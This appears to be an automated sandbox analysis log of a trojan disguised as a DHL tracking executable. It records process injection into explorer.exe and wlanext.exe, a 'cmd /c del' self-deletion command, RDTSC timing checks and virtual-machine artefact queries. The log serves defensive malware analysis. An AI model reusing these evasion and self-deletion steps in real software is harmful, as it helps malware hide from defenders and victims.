          Source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360581864.0000000003066000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.359981345.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436567042.0000000000C8F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437751802.0000000002A02000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exeVirustotal: Detection: 43%
          Source: DHL AWB TRACKING DETAILS.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile read: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\nsr8F19.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@1/0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: wntdll.pdbUGP source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360349373.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360736432.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00417853 push edx; retf 1_2_004178A1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00416978 push cs; retf 1_2_0041698A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D4B5 push eax; ret 1_2_0041D508
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D56C push eax; ret 1_2_0041D572
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D502 push eax; ret 1_2_0041D508
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D50B push eax; ret 1_2_0041D572
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A5D0D1 push ecx; ret 1_2_00A5D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0337D0D1 push ecx; ret 11_2_0337D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A17853 push edx; retf 11_2_00A178A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A16978 push cs; retf 11_2_00A1698A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D4B5 push eax; ret 11_2_00A1D508
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D502 push eax; ret 11_2_00A1D508
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D50B push eax; ret 11_2_00A1D572
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D56C push eax; ret 11_2_00A1D572
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-3936
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000A09904 second address: 0000000000A0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000A09B7E second address: 0000000000A09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeAPI coverage: 8.7 %
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 9.7 %
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-3628
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-3630
          Source: explorer.exe, 00000014.00000003.551487673.0000000004F94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.551200673.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
          Source: explorer.exe, 00000004.00000000.372241858.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000014.00000003.571183562.000000000507F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BKX~
          Source: explorer.exe, 00000014.00000003.551200673.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00s
          Source: explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
          Source: explorer.exe, 00000014.00000003.595515909.000000000F4E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.558334108.000000000508E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9
          Source: explorer.exe, 00000014.00000000.607327645.0000000004E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.391707126.0000000008430000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000000.398584347.000000000095C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_02380402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_02380616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_02380706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_02380744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_023806C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h]
